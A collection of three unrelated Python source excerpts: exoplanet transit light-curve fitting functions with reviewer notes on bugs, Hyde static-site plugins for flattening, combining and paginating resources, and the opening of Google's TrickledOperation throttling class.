        being fit.
        """
        #make a mask for each planet candidate
        self.onlytransits = True
        tregion = np.zeros(self.nplanets)
        maskdat = np.zeros([self.npt, self.nplanets], dtype=bool)
        if self.n_ldparams == 2:
            addval = 0
        elif self.n_ldparams == 4:
            addval = 2
        for i in range(self.nplanets):
            T0 = self.fit_sol[i*6 + 4+addval]
            per = self.fit_sol[i*6 + 5+addval]
            rho = self.fit_sol[0]
            ars = self.get_ar(rho, per)
            # transit duration (days): P/(pi * a/R*)
            tdur_dys = (1./ars) * per * (1./np.pi)
            #this is buggy because T0 is not nessessarily time of first
            #transit but time of a transit. So fudge.
            #subtract make T0 the first transit
            time0 = np.copy(T0)
            # NOTE(review): time0 is never used after this loop; the
            # transit times below are built from T0 directly.
            while True:
                if time0 - per < self.time[0]:
                    break
                else:
                    time0 = time0 - per
            ntransits = int((self.time[-1] - self.time[0]) / per) + 1
            t_times = np.arange(ntransits)*per + T0
            #make sure the first and last transit are not excluded even
            #if partially in the data
            t_times = np.r_[t_times, t_times[0] - per, t_times[-1] + per]
            for j in t_times:
                maskdat[:, i] = np.logical_or(maskdat[:, i],
                    np.logical_and(
                        self.time < j + tdur_dys*ntdur,
                        self.time > j - tdur_dys*ntdur))
            tregion[i] = ntdur*tdur_dys
        #create a final mask that is the OR of the individual masks
        finmask = np.zeros(self.npt)
        for i in range(self.nplanets):
            finmask = np.logical_or(finmask, maskdat[:, i])
        self.time = self.time[finmask]
        self.flux = self.flux[finmask]
        self.err = self.err[finmask]
        self._itime = self._itime[finmask]
        self._datatype = self._datatype[finmask]
        self.tregion = tregion
def get_ar(rho, period):
    """
    Return the scaled semi-major axis a/R* from Kepler's third law.

    rho : mean stellar density in g/cc
    period : orbital period in days

    Uses (a/R*)^3 = G * rho_SI * P^2 / (3 * pi).
    """
    G_SI = 6.67E-11
    density_si = rho * 1000.          # g/cc -> kg/m^3
    period_seconds = period * 86400.  # days -> seconds
    cubed = period_seconds**2 * G_SI * density_si / (3. * np.pi)
    return cubed**(1./3.)
def logchi2(fitsol, nplanets, rho_0, rho_0_unc, rho_prior,
            flux, err, fixed_sol, time, itime, ntt, tobs, omc, datatype,
            onlytransits=False, tregion=0.0):
    """
    Log-posterior for the basic transit model.

    fitsol layout: [rho, zpt] followed by
    [T0, per, b, rprs, ecosw, esinw] for each planet.
    Returns -np.inf for any parameter outside its hard prior range,
    otherwise the log-posterior of the light-curve fit (with an
    optional Gaussian prior on rho and a 1/ecc eccentricity prior).
    """
    #here are some priors to keep values sensible
    rho = fitsol[0]
    if rho < 0.0001 or rho > 100.:
        return -np.inf
    rprs = fitsol[np.arange(nplanets)*6 + 5]
    if np.any(rprs < 0.) or np.any(rprs > 0.5):
        return -np.inf
    ecosw = fitsol[np.arange(nplanets)*6 + 6]
    if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
        return -np.inf
    esinw = fitsol[np.arange(nplanets)*6 + 7]
    if np.any(esinw < -1.0) or np.any(esinw > 1.0):
        return -np.inf
    #avoid parabolic orbits
    ecc = np.sqrt(esinw**2 + ecosw**2)
    if np.any(ecc > 1.0):
        return -np.inf
    #avoid orbits where the planet enters the star
    per = fitsol[np.arange(nplanets)*6 + 3]
    ar = get_ar(rho, per)
    if np.any(ecc > (1.-(1./ar))):
        return -np.inf
    b = fitsol[np.arange(nplanets)*6 + 4]
    if np.any(b < 0.) or np.any(b > 1.0 + rprs):
        return -np.inf
    if onlytransits:
        T0 = fitsol[np.arange(nplanets)*6 + 2]
        # NOTE(review): this compares T0 against itself, so it can never
        # be True -- presumably the intent was to compare against the
        # initial-guess T0; confirm before relying on the tregion cut.
        if np.any(T0 < T0 - tregion) or np.any(T0 > T0 + tregion):
            return -np.inf
    model_lc = calc_model(fitsol, nplanets, fixed_sol,
                          time, itime, ntt, tobs, omc, datatype)
    if rho_prior:
        chi2prior = (rho_0 - rho)**2 / rho_0_unc**2
    else:
        chi2prior = 0.0
    # guard against log(1/0) below
    ecc[ecc == 0.0] = 1.E-10
    chi2ecc = np.log(1. / ecc)
    chi2val = np.sum((model_lc - flux)**2 / err**2)
    # NOTE(review): chi2const is computed but never used
    chi2const = np.log(1. / (np.sqrt(2.*np.pi) * np.mean(err)))
    # NOTE(review): chi2prior enters with a positive sign here, unlike
    # the -0.5 factor used by the sibling log-likelihood functions.
    chi2tot = (-chi2val/2.) + chi2prior
    #include eccentricity in the prior
    #having np.log(chi2ecc) -> e**(-chi2/2) / ecc
    logp = chi2tot + np.sum(chi2ecc)
    return logp
def calc_model(fitsol, nplanets, fixed_sol, time, itime, ntt, tobs, omc, datatype):
    """
    Evaluate the transit model and return (model flux - 1).

    Re-packs the fitted and fixed parameters into the flat solution
    vector expected by tmod.transitmodel:
    [rho, ld1, ld2, ld3, ld4, dil, veloffset, zpt] followed by ten
    values per planet: the six fitted orbit parameters plus the four
    fixed quantities (rvamp, occ, ell, alb).
    """
    sol = np.zeros([8 + 10*nplanets])
    rho = fitsol[0]
    zpt = fitsol[1]
    ld1, ld2, ld3, ld4 = fixed_sol[0:4]
    dil = fixed_sol[4]
    veloffset = fixed_sol[5]
    # rvamp, occ, ell, alb -- shared by every planet
    fixed_stuff = fixed_sol[6:10]
    sol[0:8] = np.array([rho, ld1, ld2, ld3, ld4,
                         dil, veloffset, zpt])
    for i in xrange(nplanets):
        sol[8+(i*10):8+(i*10)+10] = np.r_[fitsol[2+i*6:8+i*6], fixed_stuff]
    tmodout = tmod.transitmodel(nplanets, sol, time, itime,
                                ntt, tobs, omc, datatype)
    return tmodout - 1.
def logchi2_paramprior(fitsol, nplanets, rho_0, rho_0_unc, rho_prior,
                       teff_0, teff_0_unc, logg_0, logg_0_unc, feh_0, feh_0_unc,
                       flux, err, fixed_sol, time, itime, ntt, tobs, omc, datatype,
                       n_ldparams=2, ldfileloc='/Users/tom/svn_code/tom_code/',
                       onlytransits=False, tregion=0.0):
    """
    Log-posterior with Teff/logg/[Fe/H] as free parameters.

    Limb darkening is re-interpolated from the Claret tables at every
    step. fitsol layout: [rho, zpt, teff, logg, feh] followed by
    [T0, per, b, rprs, ecosw, esinw] for each planet.
    Returns -np.inf for any parameter outside its hard prior range.
    """
    minf = -np.inf
    #here are some priors to keep values sensible
    rho = fitsol[0]
    if rho < 1.E-6 or rho > 100.:
        return minf
    teff = fitsol[2]
    if teff < 3500 or teff > 50000.:
        return minf
    logg = fitsol[3]
    if logg < 0.0 or logg > 5.:
        return minf
    feh = fitsol[4]
    if feh < -5. or feh > 1.:
        return minf
    rprs = fitsol[np.arange(nplanets)*6 + 8]
    if np.any(rprs < 0.) or np.any(rprs > 0.5):
        return minf
    ecosw = fitsol[np.arange(nplanets)*6 + 9]
    if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
        return minf
    esinw = fitsol[np.arange(nplanets)*6 + 10]
    if np.any(esinw < -1.0) or np.any(esinw > 1.0):
        return minf
    #avoid parabolic orbits
    ecc = np.sqrt(esinw**2 + ecosw**2)
    if np.any(ecc > 1.0):
        return minf
    #avoid orbits where the planet enters the star
    per = fitsol[np.arange(nplanets)*6 + 6]
    ar = get_ar(rho, per)
    if np.any(ecc > (1.-(1./ar))):
        return minf
    b = fitsol[np.arange(nplanets)*6 + 7]
    if np.any(b < 0.) or np.any(b > 1.0 + rprs):
        return minf
    if onlytransits:
        T0 = fitsol[np.arange(nplanets)*6 + 5]
        # NOTE(review): tautology -- T0 is compared against itself, so
        # this can never trigger; probably meant the initial-guess T0.
        if np.any(T0 < T0 - tregion) or np.any(T0 > T0 + tregion):
            return minf
    #calc thing limb darkening here
    if n_ldparams == 2:
        #if teff < 3500 and logg >= 3.5:
        # dead branch left over from an earlier PHOENIX-table code path
        if False:
            #this block should never run
            ldfile = ldfileloc + 'claret-quad-phoenix.txt'
            ld1, ld2 = ld_quad(ldfile,
                               teff, logg)
            ld3 = 0.0
            ld4 = 0.0
        #elif logg < 3.5 or teff >= 3500:
        if True:
            ldfile = ldfileloc + 'claret-limb-quad.txt'
            ld1, ld2 = claretquad(ldfile,
                                  teff, logg, feh)
            ld3 = 0.0
            ld4 = 0.0
    elif n_ldparams == 4:
        ldfile = ldfileloc + 'claret-limb.txt'
        ld1, ld2, ld3, ld4 = claretlimb4p(ldfile,
                                          teff, logg, feh)
    lds = np.array([ld1, ld2, ld3, ld4])
    # strip teff/logg/feh (columns 2:5) before handing to calc_model
    fitsol_model_calc = np.r_[fitsol[0:2], fitsol[5:]]
    fixed_sol_model_calc = np.r_[lds, fixed_sol]
    model_lc = calc_model(fitsol_model_calc, nplanets, fixed_sol_model_calc,
                          time, itime, ntt, tobs, omc, datatype)
    if rho_prior:
        # NOTE(review): the boolean flag rho_prior is rebound here to a
        # float chi-square term; it works, but shadows the flag.
        rho_prior = (rho_0 - rho)**2 / rho_0_unc**2
        #teff_prior = (teff_0 - teff)**2 / teff_0_unc**2
        #logg_prior = (logg_0 - logg)**2 / logg_0_unc**2
        #feh_prior = (feh_0 - feh)**2 / feh_0_unc**2
        #chi2prior = rho_prior+teff_prior+logg_prior+feh_prior
    else:
        rho_prior = 0.0
    # Gaussian priors on the spectroscopic stellar parameters
    teff_prior = (teff_0 - teff)**2 / teff_0_unc**2
    logg_prior = (logg_0 - logg)**2 / logg_0_unc**2
    feh_prior = (feh_0 - feh)**2 / feh_0_unc**2
    chi2prior = -0.5*(rho_prior+teff_prior+logg_prior+feh_prior)
    # guard against log(1/0) below
    ecc[ecc == 0.0] = 1.E-10
    chi2ecc = np.log(1. / ecc)
    chi2val = -0.5*np.sum(((model_lc - flux) * (model_lc - flux))
                          / (err*err))
    #chi2const = np.log(np.sum(1./(np.sqrt(2.*np.pi)*err)))
    chi2const = 0.0
    chi2tot = chi2const + chi2val + chi2prior
    #include eccentricity in the prior
    #having np.log(chi2ecc) -> e**(-chi2/2) / ecc
    logp = chi2tot + np.sum(chi2ecc)
    return logp
def logchi2_fitldp(fitsol, nplanets, rho_0, rho_0_unc, rho_prior,
                   ld1_0, ld1_0_unc, ld2_0, ld2_0_unc, ldp_prior,
                   flux, err, fixed_sol, time, itime, ntt, tobs, omc, datatype,
                   n_ldparams=2, ldfileloc='/Users/tom/svn_code/tom_code/',
                   onlytransits=False, tregion=0.0):
    """
    Log-posterior for the transit model with free limb darkening and a
    white-noise jitter term (the final element of fitsol).

    fitsol layout: [rho, zpt, ld1, ld2(, ld3, ld4)] followed by
    [T0, per, b, rprs, ecosw, esinw] per planet, then jitter.
    Returns -np.inf for any parameter outside its hard prior range,
    otherwise the Gaussian log-likelihood of the light curve plus the
    optional rho and limb-darkening priors and a 1/ecc prior.
    """
    minf = -np.inf
    #here are some priors to keep values sensible
    rho = fitsol[0]
    if rho < 1.E-6 or rho > 100.:
        return minf
    ld1 = fitsol[2]
    ld2 = fitsol[3]
    #some limb darkening constraints
    #from Burke et al. 2008 (XO-2b)
    if ld1 < 0.0:
        return minf
    if ld1 + ld2 > 1.0:
        return minf
    if ld1 + 2.*ld2 < 0.0:
        return minf
    if ld2 < -0.8:
        return minf
    if n_ldparams == 2:
        ld3, ld4 = 0.0, 0.0
        addval = 0
    elif n_ldparams == 4:
        ld3 = fitsol[4]
        ld4 = fitsol[5]
        # per-planet columns shift right by two when ld3/ld4 are fit
        addval = 2
    rprs = fitsol[np.arange(nplanets)*6 + 7 + addval]
    if np.any(rprs < 0.) or np.any(rprs > 0.5):
        return minf
    ecosw = fitsol[np.arange(nplanets)*6 + 8+addval]
    if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
        return minf
    esinw = fitsol[np.arange(nplanets)*6 + 9+addval]
    if np.any(esinw < -1.0) or np.any(esinw > 1.0):
        return minf
    #avoid parabolic orbits
    ecc = np.sqrt(esinw**2 + ecosw**2)
    if np.any(ecc > 1.0):
        return minf
    #avoid orbits where the planet enters the star
    per = fitsol[np.arange(nplanets)*6 + 5+addval]
    ar = get_ar(rho, per)
    if np.any(ecc > (1.-(1./ar))):
        return minf
    b = fitsol[np.arange(nplanets)*6 + 6+addval]
    if np.any(b < 0.) or np.any(b > 1.0 + rprs):
        return minf
    if onlytransits:
        T0 = fitsol[np.arange(nplanets)*6 + 4+addval]
        # NOTE(review): tautology -- T0 is compared against itself and
        # can never trigger; probably meant the initial-guess T0.
        if np.any(T0 < T0 - tregion) or np.any(T0 > T0 + tregion):
            return minf
    jitter = fitsol[-1]
    if jitter < 0.0:
        return minf
    # add the jitter in quadrature to the reported errors
    err_jit = np.sqrt(err**2 + jitter**2)
    err_jit2 = err**2 + jitter**2
    lds = np.array([ld1, ld2, ld3, ld4])
    # strip the limb-darkening columns before handing to calc_model
    # NOTE(review): for n_ldparams == 4 this slice (fitsol[4:]) still
    # includes ld3/ld4; confirm whether fitsol[6:] was intended.
    fitsol_model_calc = np.r_[fitsol[0:2], fitsol[4:]]
    fixed_sol_model_calc = np.r_[lds, fixed_sol]
    model_lc = calc_model(fitsol_model_calc, nplanets, fixed_sol_model_calc,
                          time, itime, ntt, tobs, omc, datatype)
    # guard against log(0) in the eccentricity prior below
    ecc[ecc == 0.0] = 1.E-10
    npt_lc = len(err_jit)
    # full Gaussian log-likelihood of the light curve, including the
    # normalisation term (needed because jitter changes the errors)
    loglc = (
        - (npt_lc/2.)*np.log(2.*np.pi)
        - 0.5 * np.sum(np.log(err_jit2))
        - 0.5 * np.sum((model_lc - flux)**2 / err_jit2)
    )
    if rho_prior:
        logrho = (
            - 0.5 * np.log(2.*np.pi)
            - 0.5 * np.log(rho_0_unc**2)
            - 0.5 * (rho_0 - rho)**2 / rho_0_unc**2
        )
    else:
        # BUGFIX: this previously rebound rho_prior = 0.0, leaving
        # logrho undefined and raising NameError in the sum below.
        logrho = 0.0
    if ldp_prior:
        logld1 = (
            - 0.5 * np.log(2.*np.pi)
            - 0.5 * np.log(ld1_0_unc**2)
            - 0.5 * (ld1_0 - ld1)**2 / ld1_0_unc**2
        )
        logld2 = (
            - 0.5 * np.log(2.*np.pi)
            - 0.5 * np.log(ld2_0_unc**2)
            - 0.5 * (ld2_0 - ld2)**2 / ld2_0_unc**2
        )
        logldp = logld1 + logld2
    else:
        logldp = 0.0
    # 1/ecc eccentricity prior
    logecc = - np.sum(np.log(ecc))
    logLtot = loglc + logrho + logldp + logecc
    return logLtot
# def calc_model_paramprior(fitsol,nplanets,fixed_sol,time,itime,ntt,tobs,omc,datatype):
# sol = np.zeros([8 + 10*nplanets])
# rho = fitsol[0]
# zpt = fitsol[1]
# ld1,ld2,ld3,ld4 = fixed_sol[0:4]
# dil = fixed_sol[4]
# veloffset = fixed_sol[5]
# fixed_stuff = fixed_sol[6:10]
# sol[0:8] = np.array([rho,ld1,ld2,ld3,ld4,
# dil,veloffset,zpt])
# for i in xrange(nplanets):
# sol[8+(i*10):8+(i*10)+10] = np.r_[fitsol[2+i*6:8+i*6],fixed_stuff]
# tmodout = tmod.transitmodel(nplanets,sol,time,itime,
# ntt,tobs,omc,datatype)
# return tmodout - 1.
def get_stats(par_arr, noprint=False):
    """
    Summarise a posterior sample array.

    par_arr : array-like
        flat array of MCMC samples for one parameter
    noprint : bool, optional
        suppress printing of the 95% credible interval

    Returns
    -------
    ndarray of [median, stddev, p1, m1, p2, m2, p3, m3] where the
    p/m values are the offsets from the median to the upper/lower
    1-, 2- and 3-sigma percentiles of the sorted sample.
    """
    # two-sided tail fractions for 1, 2 and 3 sigma
    onesig = (1. - 0.682689492) / 2.
    twosig = (1. - 0.954499736) / 2.
    threesig = (1. - 0.997300204) / 2.
    med = np.median(par_arr)
    stdev = np.std(par_arr)
    sort_arr = np.sort(par_arr)
    nval = len(par_arr)
    # BUGFIX: np.floor returns a float, which modern NumPy rejects as
    # an array index -- cast the percentile positions to int
    m1 = med - sort_arr[int(np.floor(onesig * nval))]
    p1 = sort_arr[int(np.floor(nval - (onesig * nval)))] - med
    m2 = med - sort_arr[int(np.floor(twosig * nval))]
    p2 = sort_arr[int(np.floor(nval - (twosig * nval)))] - med
    m3 = med - sort_arr[int(np.floor(threesig * nval))]
    p3 = sort_arr[int(np.floor(nval - (threesig * nval)))] - med
    ninefivelow = sort_arr[int(np.floor(0.025 * nval))]
    ninefivehigh = sort_arr[int(np.floor(0.975 * nval))]
    if not noprint:
        print('95percent credible interval = %s - %s'
              % (ninefivelow, ninefivehigh))
    return np.array([med, stdev, p1, m1, p2, m2, p3, m3])
def model_real_paramprior(rho, zpt, teff, logg, feh, T0,
                          per, b, rprs, ecosw, esinw,
                          time, itime, ntt, tobs, omc, datatype,
                          n_ldparams=2,
                          ldfileloc='/Users/tom/svn_code/tom_code/'):
    """
    Evaluate a single-planet transit model from physical parameters.

    Quadratic limb darkening is looked up from the Claret table for the
    given Teff/logg/[Fe/H]; dilution, velocity offset, beaming,
    occultation, ellipsoidal and albedo terms are all fixed at zero.
    Returns the model flux minus 1.

    NOTE(review): n_ldparams is accepted but ignored -- the quadratic
    table is always used.
    """
    ldfile = ldfileloc + 'claret-limb-quad.txt'
    ld1, ld2 = claretquad(ldfile, teff, logg, feh)
    ld3 = 0.0
    ld4 = 0.0
    dil = 0.0
    veloffset = 0.0
    rvamp = 0.0
    occ = 0.0
    ell = 0.0
    alb = 0.0
    nplanets = 1
    # flat solution vector in the order tmod.transitmodel expects
    sol = np.array([rho, ld1, ld2, ld3, ld4,
                    dil, veloffset, zpt, T0, per, b, rprs, ecosw, esinw,
                    rvamp, occ, ell, alb])
    tmodout = tmod.transitmodel(nplanets, sol, time, itime,
                                ntt, tobs, omc, datatype) - 1.0
    return tmodout
def testtom(t, num):
    """
    Plot one phase-folded posterior-sample model (debugging helper).

    t : walker-chain array; t[..., num] selects one sample's parameters.

    NOTE(review): relies on module-level globals M (the data object),
    a and plt, none of which are defined in this module -- it only
    works in an interactive session where they exist. The computed
    model `mod` is never used.
    """
    rho, zpt, teff, logg, feh, T0, per, b, rprs, ecosw, esinw = (t[..., num])
    mod = model_real_paramprior(rho, zpt, teff, logg, feh, T0, per, b, rprs, ecosw,
        esinw, M.time, M._itime, M._ntt, M._tobs, M._omc, M._datatype,
        n_ldparams=2, ldfileloc='/Users/tom/svn_code/tom_code/')
    q, f = get_qf(M.time, a, per, T0)
    plt.plot(q, f, alpha=0.5)
def run_crap(t):
    """
    Overplot ten random posterior-sample models on the folded data
    (throwaway debugging helper, as the name suggests).

    NOTE(review): depends on globals M, plt and random, and on `per`
    and `T0`, which are not defined in this scope -- this raises
    NameError unless they exist as globals in an interactive session.
    """
    for num in random.choice(np.arange(len(t[1])), size=10):
        testtom(t, num)
    q, f = get_qf(M.time, M.flux, per, T0)
    plt.scatter(q, f, s=1, color='k', alpha=0.2)
def get_qf(time, flux, period, epoch):
    """
    Phase-fold a light curve about a transit epoch.

    Returns the sorted phase (hours from mid-transit, in [-12P, 12P))
    and the flux in ppm, reordered to match the sorted phase.
    """
    shifted = (time - epoch) + 0.5 * period
    cycles = shifted / period
    frac = cycles - np.floor(cycles)
    phase_hours = frac * 24. * period - 12 * period
    order = np.argsort(phase_hours)
    return phase_hours[order], flux[order] * 1.E6
| |
# -*- coding: utf-8 -*-
"""
Plugins related to structure
"""
from hyde._compat import reduce
from hyde.ext.plugins.meta import Metadata
from hyde.plugin import Plugin
from hyde.site import Resource
from hyde.util import pairwalk
from fswrap import File, Folder
import os
from fnmatch import fnmatch
import operator
#
# Folder Flattening
#
class FlattenerPlugin(Plugin):
    """
    The plugin class for flattening nested folders.

    Each `flattener` item in the site configuration names a source node
    whose resources are re-deployed directly into a target folder.
    """
    def __init__(self, site):
        super(FlattenerPlugin, self).__init__(site)

    def begin_site(self):
        """
        Finds all the folders that need flattening and changes the
        relative deploy path of all resources in those folders.
        """
        try:
            flatten_items = self.site.config.flattener.items
        except AttributeError:
            flatten_items = []
        for entry in flatten_items:
            # skip misconfigured entries missing source/target
            try:
                source_node = self.site.content.node_from_relative_path(
                    entry.source)
                destination = Folder(entry.target)
            except AttributeError:
                continue
            if not source_node:
                continue
            for resource in source_node.walk_resources():
                flattened_path = destination.child(resource.name)
                self.logger.debug(
                    'Flattening resource path [%s] to [%s]' %
                    (resource, flattened_path))
                resource.relative_deploy_path = flattened_path
            for child in source_node.walk():
                child.relative_deploy_path = destination.path
#
# Combine
#
class CombinePlugin(Plugin):
    """
    To use this combine, the following configuration should be added
    to meta data::
        combine:
            sort: false #Optional. Defaults to true.
            root: content/media #Optional. Path must be relative to content
                                folder - default current folder
            recurse: true #Optional. Default false.
            files:
                - ns1.*.js
                - ns2.*.js
            where: top
            remove: yes
    `files` is a list of resources (or just a resource) that should be
    combined. Globbing is performed. `where` indicate where the
    combination should be done. This could be `top` or `bottom` of the
    file. `remove` tell if we should remove resources that have been
    combined into the resource.
    """
    def __init__(self, site):
        super(CombinePlugin, self).__init__(site)

    def _combined(self, resource):
        """
        Return the list of resources to combine to build this one.
        """
        try:
            config = resource.meta.combine
        except AttributeError:
            return []  # Not a combined resource
        try:
            files = config.files
        except AttributeError:
            raise AttributeError("No resources to combine for [%s]" % resource)
        # allow a single pattern string as shorthand for a one-item list
        if type(files) is str:
            files = [files]
        # Grab resources to combine
        # select site root
        try:
            root = self.site.content.node_from_relative_path(
                resource.meta.combine.root)
        except AttributeError:
            root = resource.node
        # select walker
        try:
            recurse = resource.meta.combine.recurse
        except AttributeError:
            recurse = False
        walker = root.walk_resources() if recurse else root.resources
        # Must we sort?
        try:
            sort = resource.meta.combine.sort
        except AttributeError:
            sort = True
        if sort:
            # alphabetical order by resource name
            resources = sorted([r for r in walker
                                if any(fnmatch(r.name, f) for f in files)],
                               key=operator.attrgetter('name'))
        else:
            # unsorted: order resources by the order of the `files`
            # patterns. NOTE(review): `f in r` tests membership of the
            # pattern in the (pattern, resource) tuple, i.e. pattern
            # equality -- convoluted, but it groups matches by pattern;
            # confirm before refactoring.
            resources = [(f, r)
                         for r in walker for f in files if fnmatch(r.name, f)]
            resources = [r[1] for f in files for r in resources if f in r]
        if not resources:
            self.logger.debug("No resources to combine for [%s]" % resource)
            return []
        return resources

    def begin_site(self):
        """
        Initialize the plugin and search for the combined resources
        """
        for node in self.site.content.walk():
            for resource in node.resources:
                resources = self._combined(resource)
                if not resources:
                    continue
                # Build depends
                if not hasattr(resource, 'depends'):
                    resource.depends = []
                resource.depends.extend(
                    [r.relative_path for r in resources
                     if r.relative_path not in resource.depends])
                # Remove combined resources if needed
                if hasattr(resource.meta.combine, "remove") and \
                   resource.meta.combine.remove:
                    for r in resources:
                        self.logger.debug(
                            "Resource [%s] removed because combined" % r)
                        r.is_processable = False

    def begin_text_resource(self, resource, text):
        """
        When generating a resource, add combined file if needed.
        """
        resources = self._combined(resource)
        if not resources:
            return
        where = "bottom"
        try:
            where = resource.meta.combine.where
        except AttributeError:
            pass
        if where not in ["top", "bottom"]:
            raise ValueError("%r should be either `top` or `bottom`" % where)
        self.logger.debug(
            "Combining %d resources for [%s]" % (len(resources),
                                                 resource))
        # prepend or append the combined sources around the resource text
        if where == "top":
            return "".join([r.source.read_all() for r in resources] + [text])
        else:
            return "".join([text] + [r.source.read_all() for r in resources])
#
# Pagination
#
class Page:
    """A single page of paginated resources."""
    def __init__(self, posts, number):
        # posts: the resources belonging to this page
        # number: 1-based page index
        self.posts = posts
        self.number = number
class Paginator:
    """
    Iterates resources which have pages associated with them.
    """
    # default deploy-path template for pages 2..N; $PAGE, $FILE and
    # $EXT are substituted in _relative_url
    file_pattern = 'page$PAGE/$FILE$EXT'

    def __init__(self, settings):
        # settings comes from the resource's `paginator` metadata
        self.sorter = getattr(settings, 'sorter', None)
        self.size = getattr(settings, 'size', 10)
        self.file_pattern = getattr(
            settings, 'file_pattern', self.file_pattern)

    def _relative_url(self, source_path, number, basename, ext):
        """
        Create a new URL for a new page. The first page keeps the same name;
        the subsequent pages are named according to file_pattern.
        """
        path = File(source_path)
        if number != 1:
            filename = self.file_pattern.replace('$PAGE', str(number)) \
                .replace('$FILE', basename) \
                .replace('$EXT', ext)
            path = path.parent.child(os.path.normpath(filename))
        return path

    def _new_resource(self, base_resource, node, page_number):
        """
        Create a new resource as a copy of a base_resource, with a page of
        resources associated with it.
        """
        res = Resource(base_resource.source_file, node)
        # give the copy its own metadata chain so per-page values can
        # differ from the base resource
        res.node.meta = Metadata(node.meta)
        res.meta = Metadata(base_resource.meta, res.node.meta)
        brs = base_resource.source_file
        path = self._relative_url(base_resource.relative_path,
                                  page_number,
                                  brs.name_without_extension,
                                  brs.extension)
        res.set_relative_deploy_path(path)
        return res

    @staticmethod
    def _attach_page_to_resource(page, resource):
        """
        Hook up a page and a resource.
        """
        resource.page = page
        page.resource = resource

    @staticmethod
    def _add_dependencies_to_resource(dependencies, resource):
        """
        Add a bunch of resources as dependencies to another resource.
        """
        if not hasattr(resource, 'depends'):
            resource.depends = []
        resource.depends.extend([dep.relative_path for dep in dependencies
                                 if dep.relative_path not in resource.depends])

    def _walk_pages_in_node(self, node):
        """
        Segregate each resource into a page.
        """
        # use the sorter-specific walker if configured and available,
        # falling back to the plain resource walk
        walker = 'walk_resources'
        if self.sorter:
            walker = 'walk_resources_sorted_by_%s' % self.sorter
        walker = getattr(node, walker, getattr(node, 'walk_resources'))
        posts = list(walker())
        number = 1
        # slice the post list into consecutive pages of self.size
        while posts:
            yield Page(posts[:self.size], number)
            posts = posts[self.size:]
            number += 1

    def walk_paged_resources(self, node, resource):
        """
        Group the resources and return the new page resources.
        """
        added_resources = []
        pages = list(self._walk_pages_in_node(node))
        resource.pages = pages
        if pages:
            # the original resource becomes page 1 and depends on all
            # the posts across every page
            deps = reduce(list.__add__, [page.posts for page in pages], [])
            Paginator._attach_page_to_resource(pages[0], resource)
            Paginator._add_dependencies_to_resource(deps, resource)
            for page in pages[1:]:
                # make new resource
                new_resource = self._new_resource(resource, node, page.number)
                Paginator._attach_page_to_resource(page, new_resource)
                new_resource.depends = resource.depends
                added_resources.append(new_resource)
                new_resource.pages = pages
        # link the pages into a doubly-linked previous/next chain
        for prev, next in pairwalk(pages):
            next.previous = prev
            prev.next = next
        return added_resources
class PaginatorPlugin(Plugin):
    """
    Paginator plugin.
    Configuration: in a resource's metadata:
        paginator:
            sorter: time
            size: 5
            file_pattern: page$PAGE/$FILE$EXT   # optional
    then in the resource's content:
        {% for res in resource.page.posts %}
        {% refer to res.relative_path as post %}
        {{ post }}
        {% endfor %}
        {{ resource.page.previous }}
        {{ resource.page.next }}
    """
    def __init__(self, site):
        super(PaginatorPlugin, self).__init__(site)

    def begin_site(self):
        """Split every resource that declares `meta.paginator` into pages."""
        for node in self.site.content.walk():
            new_resources = []
            for res in node.resources:
                # only resources that carry paginator metadata are paged
                if not (hasattr(res, "meta") and
                        hasattr(res.meta, 'paginator')):
                    continue
                pager = Paginator(res.meta.paginator)
                new_resources += pager.walk_paged_resources(node, res)
            node.resources += new_resources
| |
# Copyright 2006 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library to allow for long running, slow operations.
Intended mainly for database operations, this library provides a
skeleton to safely execute a given set of operations such that the
runtime is a fraction of realtime (such as N% utilization). It is
designed to keep track of its position and be restartable, though that
is dependent upon the class that subclasses TrickledOperation.
"""
__author__ = 'bbiskebo@google.com (Brian Biskeborn)'
# Original author: chip@google.com (Chip Turner)
import logging
import time
class TrickledOperation(object):
    """The class representing both how a trickle operation is performed and
    the state associated with a given operation.

    Users of this class will subclass it and implement the protected
    methods _SetupTrickle, _Finished, _PerformTrickle, and
    _FinalizeTrickle.  These methods will be called during a trickle
    operation such that the size of the batch passed to _PerformTrickle
    tries to be exactly utilization_percent of each cycle_time.

    Specifying utilization_percent=100 turns off all sleeping, and
    does the work at maximum speed.
    """

    def __init__(self, utilization_percent, cycle_time):
        """Constructor. Subclass and store operation-specific state here.

        Args:
          utilization_percent: percent of time to spend in _PerformTrickle
          cycle_time: interval over which utilization_percent is
            calculated per run
        """
        self._utilization_fraction = utilization_percent / 100.0
        self._cycle_time = cycle_time
        # Start maximally cautious (single statement)
        # and increase batch size as we can
        self._batch_size = 1
        # Hard ceiling on batch size; can be lowered via SetBatchSizeLimit().
        self._batch_size_limit = 1000000
        # When True, Trickle() logs per-cycle progress via logging.info.
        self.verbose = True

    def _SetupTrickle(self):
        """A setup method, invoked before a trickle loop is run.

        It is valid to execute multiple loops, and this method will be
        invoked for each.  Useful for finding the next starting position.
        """
        raise NotImplementedError('call to pure virtual function')

    def _FinalizeTrickle(self):
        """A completion method invoked after a series of trickle loops.

        Intended to finish up state, such as the final 'slosh' rows of a
        continual copy loop.
        """
        raise NotImplementedError('call to pure virtual function')

    def _Finished(self):
        """Called to determine if a trickle is complete."""
        raise NotImplementedError('call to pure virtual function')

    def _PerformTrickle(self, batch_size):
        """The method invoked to perform the actual trickle operation.

        This method will be invoked multiple times and is passed the size
        of a batch to execute, which will vary depending upon the runtime
        of the previous batch.

        Args:
          batch_size: size of the current batch (subclass dependent)
        Returns:
          number of items processed (usually batch_size)
        """
        raise NotImplementedError('call to pure virtual function')

    def _GetProgress(self):
        """Called to fetch progress information.

        This method is intended to be overridden by inheriting classes
        that can provide data about their progress through the trickle.

        Returns:
          String representation of current progress state or None if unknown
        """
        return None

    def SetBatchSizeLimit(self, n):
        """Set the maximum batch_size that will ever be submitted by Trickle().

        Intended for operations that need to be artificially slowed down in
        excess of what the throttler would have done.  For instance, when
        replicas are drastically slower than the primary for some reason, which
        the throttler will be unable to detect.

        Args:
